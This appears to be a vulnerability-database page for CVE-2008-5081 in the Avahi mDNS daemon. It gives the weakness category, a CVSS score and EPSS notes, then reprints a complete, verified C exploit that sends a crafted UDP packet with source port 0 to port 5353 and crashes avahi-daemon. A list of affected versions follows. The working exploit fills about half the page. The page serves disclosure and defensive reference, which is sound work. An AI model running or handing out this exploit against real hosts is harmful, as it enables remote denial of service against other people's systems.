Related Weaknesses
CWE-ID |
Weakness Name |
Source |
CWE-399 |
Category : Resource Management Errors Weaknesses in this category are related to improper management of system resources. |
|
Metrics
Metrics |
Score |
Severity |
CVSS Vector |
Source |
V2 |
5 |
|
AV:N/AC:L/Au:N/C:N/I:N/A:P |
[email protected] |
EPSS
EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.
EPSS Score
The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.
EPSS Percentile
The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
Exploit information
Exploit Database EDB-ID : 7520
Publication date : 2008-12-18 23h00 +00:00
Author : Jon Oberheide
EDB Verified : Yes
/*
* cve-2008-5081.c
*
* Avahi mDNS Daemon Remote DoS < 0.6.24
* Jon Oberheide <
[email protected]>
* http://jon.oberheide.org
*
* Usage:
*
* gcc cve-2008-5081.c -ldnet -o cve-2008-5081
* ./cve-2008-5081 1.2.3.4
*
* Information:
*
* http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5081
*
* Crafted mDNS packet with source port 0 can cause avahi-daemon
* to abort() due to failed assertion assert(port > 0); in
* originates_from_local_legacy_unicast_socket() function in
* avahi-core/server.c.
*
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <dnet.h>
int
main(int argc, char **argv)
{
ip_t *sock;
intf_t *intf;
struct addr dst;
struct ip_hdr *ip;
struct udp_hdr *udp;
struct intf_entry entry;
int len = IP_HDR_LEN + UDP_HDR_LEN;
char buf[len];
if (argc < 2 || addr_aton(argv[1], &dst)) {
printf("error: please specify a target ip address\n");
return 1;
}
memset(buf, 0, sizeof(buf));
ip = (struct ip_hdr *) buf;
ip->ip_v = 4;
ip->ip_hl = 5;
ip->ip_tos = 0;
ip->ip_off = 0;
ip->ip_sum = 0;
ip->ip_ttl = IP_TTL_MAX;
ip->ip_p = IP_PROTO_UDP;
ip->ip_id = htons(0xdead);
ip->ip_len = htons(len);
udp = (struct udp_hdr *) (buf + IP_HDR_LEN);
udp->uh_sum = 0;
udp->uh_sport = htons(0);
udp->uh_dport = htons(5353);
udp->uh_ulen = htons(UDP_HDR_LEN);
intf = intf_open();
intf_get_dst(intf, &entry, &dst);
intf_close(intf);
ip->ip_src = entry.intf_addr.addr_ip;
ip->ip_dst = dst.addr_ip;
ip_checksum(buf, len);
sock = ip_open();
if (!sock) {
printf("error: root privileges needed for raw socket\n");
return 1;
}
ip_send(sock, buf, len);
ip_close(sock);
return 0;
}
// milw0rm.com [2008-12-19]
Products Mentioned
Configuraton 0
Avahi>>Avahi >> Version To (including) 0.6.23
Avahi>>Avahi >> Version 0.1
Avahi>>Avahi >> Version 0.2
Avahi>>Avahi >> Version 0.3
Avahi>>Avahi >> Version 0.4
Avahi>>Avahi >> Version 0.5
Avahi>>Avahi >> Version 0.5.1
Avahi>>Avahi >> Version 0.5.2
Avahi>>Avahi >> Version 0.6.1
Avahi>>Avahi >> Version 0.6.2
Avahi>>Avahi >> Version 0.6.3
Avahi>>Avahi >> Version 0.6.4
Avahi>>Avahi >> Version 0.6.5
Avahi>>Avahi >> Version 0.6.6
Avahi>>Avahi >> Version 0.6.7
Avahi>>Avahi >> Version 0.6.8
Avahi>>Avahi >> Version 0.6.9
Avahi>>Avahi >> Version 0.6.10
Avahi>>Avahi >> Version 0.6.11
Avahi>>Avahi >> Version 0.6.12
Avahi>>Avahi >> Version 0.6.13
Avahi>>Avahi >> Version 0.6.14
Avahi>>Avahi >> Version 0.6.15
Avahi>>Avahi >> Version 0.6.16
Avahi>>Avahi >> Version 0.6.17
Avahi>>Avahi >> Version 0.6.18
Avahi>>Avahi >> Version 0.6.19
Avahi>>Avahi >> Version 0.6.20
Avahi>>Avahi >> Version 0.6.21
Avahi>>Avahi >> Version 0.6.22
References